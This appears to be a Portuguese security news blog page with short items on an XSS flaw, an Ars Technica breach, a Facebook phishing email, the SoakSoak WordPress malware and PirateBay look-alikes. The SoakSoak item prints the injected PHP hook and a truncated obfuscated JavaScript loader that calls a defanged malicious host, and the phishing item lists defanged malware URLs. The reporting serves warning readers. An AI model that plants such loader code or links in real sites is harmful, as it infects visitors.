Todos os posts em Curtas

HackersList.com com falha XSS

hackerslist_xss

Chama-se HackersList.com e nos últimos dias tem estado presente em imensos sites da comunicação social.
Basicamente é um serviço de aluguer de hackers profissionais para qualquer tipo de serviço.

Um utilizador intitulado de watt, encontrou e publicou uma falha XSS no site e divulgou-a no xssposed.org.
Uma falta de filtragem da variável de pesquisa, leva à possibilidade de injetar código no URL e executá-lo no browser da vítima.

Dado que à data do artigo, o site ainda estava vulnerável, enviei um email para a equipa do site.

Parece-me correto, escrever o famoso ditado popular – Casa de ferreiro, espeto de pau.

Ars Technica comprometida

arstechnica

Quem é subscritor deste portal noticioso – Ars Technica – deverá mudar a sua password assim que possível.

Aparentemente um intruso conseguiu aceder a um dos servidores web da Ars e durante uma hora tentou aceder a outras máquinas. Segundo nota oficial, o intruso conseguiu acesso à informação confidencial graças a um ficheiro backup disponível num dos servidores. No dia seguinte, o utilizador malicioso fez o deface da página da Ars Technica.

Durou apenas 15 minutos até a equipa técnica da Ars conseguir tomar as medidas necessárias para prevenir que tal situação ocorra novamente. Mudaram passwords internas, certificados e melhoraram o infra-estrutura de segurança.

Os registos de acesso mostram que o intruso poderá ter copiado a base de dados dos utilizadores. Essa base de dados contêm emails e passwords. Não contém qualquer informação de pagamentos. Convém referir também que essas passwords estão cifradas. No entanto, é sempre recomendado a mudança dos dados de autenticação.

Já recebeu hoje esta mensagem do Facebook?

facebook_voz

Alegadas mensagens de voz vindas do Facebook estão a encher as caixas de email de muitos utilizadores portugueses.
O assunto destes emails é sempre o mesmo – MENSAGEM DE NATAL e têm todos o aspeto de uma mensagem do Facebook.

O texto que acompanha o corpo do email é o seguinte:

Você recebeu um comentário de Voz em sua foto
Gravação: Para ouvir o AUDIO comentário basta clicar em Ouvir Voz comentário.
O conteúdo gravado é de responsabilidade do usuário.

O link que acompanha este email é malicioso e está alojado em hxxp://facebook-audio.cloudapp.net/audio.php. Este script PHP reencaminha para um download:
hxxp://w479565.blob4.ge.tt/streams/7WvtE272/audiovoz.zip?sig=-UpYSXaFhlWa881FTPsCW0xL3jKcoBHH480&type=download

Deve eliminar esta mensagem e, caso tenha clicado no link, correr o seu antivirus imediatamente.

Mais de 100000 sites WordPress infetados

SoakSoak-RU-Blacklisted

O Google bloqueou ontem cerca de 11.000 domínios com a última campanha de malware SoakSoak.
A empresa Sucuri suspeita que os valores sejam bem superiores e que estão relacionados com a vulnerabilidade no plugin para WordPress Revslider.

O SoakSoak modifica o seguinte ficheiro do WordPress wp-includes/template-loader.php e inclui o seguinte código:

function FuncQueueObject()
{
  wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts", 'FuncQueueObject');

Isto faz com que o swobject.js seja executado em todas as páginas do blog que inclui o seguinte malware:

eval(decodeURIComponent
("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));

Este código JavaScript ofuscado, carrega o ficheiro malicioso hxxp://soaksoak.ru/xteas/code

Contatei algumas empresas de alojamento em Portugal, que mencionaram a presença deste malware em algumas das suas contas de clientes mas que a situação encontra-se controlada.

Cuidado com as alternativas ao PirateBay

pirate_bay

Tal como está a ser feito em diversos paises, também a Vodafone Portugal bloqueou o acessos aos sites do PirateBay.
Quem utiliza este ISP poderá ver hoje a seguinte mensagem:

O site que pretende consultar encontra-se bloqueado por determinação judicial.

Diversos utilizadores começam a procurar alternativas e algumas delas podem ser perigosas. Por exemplo, ao inserir a hashtag #piratebay no Twitter, chovem mensagens privadas e replies de novos sites alternativos ao famoso PirateBay. Alguns deles com software malicioso, outros aproveitando-se desta maré de azar do PirateBay.

É necessário ter cuidado e estar atento.